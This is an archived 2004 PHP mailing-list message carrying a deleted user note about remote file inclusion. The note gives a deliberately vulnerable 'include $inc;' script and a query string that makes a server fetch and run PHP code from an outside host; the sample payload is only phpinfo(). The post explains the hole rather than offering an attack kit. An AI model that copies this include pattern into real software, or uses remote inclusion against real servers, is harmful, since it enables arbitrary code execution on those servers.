note 21177 deleted from features.remote-files by irchtml
| From: | irchtml@php.net | Date: | Sat, 28 Feb 2004 07:57:20 +0000 |
| Subject: | note 21177 deleted from features.remote-files by irchtml | ||
| References: | 1 | Groups: | php.notes |
| Request: | Send a blank email to php-notes+get-65924@lists.php.net to get a copy of this message | ||
Note Submitter: klaus@netlibrary.de
----
In my experience, I cannot agree with Toby. Scripts can indeed be run through remotely included
files. All that needs to be done is put the PHP script into an HTML or other file that is not parsed
by the remote server.
This theoretically enables a malicious scripter to attack using a series of steps. For example, a
simple .htm file with the content
<?php
echo phpinfo();
?>
will give quite a bit of information about the local system and possibly will give enough
information to wreak havoc in the server's file system. If you would like to try this out,
create an 'includetest.php' in a protected directory on your server with the content
<?php
include $inc;
?>
Pass the file to be included as 'includetest.php?inc=http://netlibrary.de/include.htm'
The page is on one of my less used servers and can be accessed with any browser to show that it is
simply the phpinfo() command I described above.
I have tested this on 3 servers, all running PHP < 4.2.0, and unless this was fixed in the latest
release, it still works.